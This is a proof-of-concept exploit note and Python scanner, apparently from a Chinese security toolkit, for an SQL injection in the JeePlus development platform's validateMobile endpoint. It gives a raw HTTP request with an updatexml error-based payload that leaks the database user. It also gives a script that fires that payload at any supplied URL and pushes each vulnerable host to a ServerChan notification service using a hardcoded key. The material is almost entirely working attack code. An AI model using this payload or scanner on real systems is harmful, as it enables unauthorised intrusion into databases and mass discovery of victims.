JeePlus快速开发平台 validateMobile SQL注入

GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzipConnection: close

# JeePlus_validateMobile_SQL_scan.pyimport requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom requests.exceptions import Timeoutimport osimport urllib.parseimport urllib.requestimport reimport timeimport sslimport urllibfrom urllib.parse import urljoin, quotedef sc_send(text, desp='', key='[SENDKEY]'):    postdata = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8')    urlserver = f'https://sctapi.ftqq.com/{key}.send'    req = urllib.request.Request(urlserver, data=postdata, method='POST')    with urllib.request.urlopen(req) as response:        result = response.read().decode('utf-8')    return resultkey = "SCT212695TeKe1ATgRMkA7f7jyrOOkH9GX"def scan_JeePlus_validateMobile_SQL(url, proxies, headers, append_to_output):    if url.endswith("/"):        path = "a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271"    else:        path = "/a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271"    if not url.startswith('http://') and not url.startswith('https://'):        url = 'http://' + url    proxies = {        'http': 'http://127.0.0.1:8080',        'https': 'http://127.0.0.1:8080'    }    headers = {        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',        'Accept-Encoding': 'gzip',    }    encodetext = url + path    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        req = requests.get(encodetext, headers=headers, verify=False, timeout=10, proxies=proxies)        if req.status_code == 500 and 'XPATH' in req.text:            append_to_output(f"[+] {url} 存在JeePlus快速开发平台 validateMobile SQL注入！！！！", "red")            ret = sc_send('JeePlus快速开发平台 validateMobile SQL注入', f"漏洞连接: {url}rn漏洞类型: SQL注入", key)        else:            append_to_output(f"[-] {url} 不存在JeePlus快速开发平台 validateMobile SQL注入", "green")    except Timeout:        append_to_output(f"[!] 请求超时，跳过URL: {url}", "yellow")    except Exception as e:        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):            append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")        else:            append_to_output(str(e), "yellow")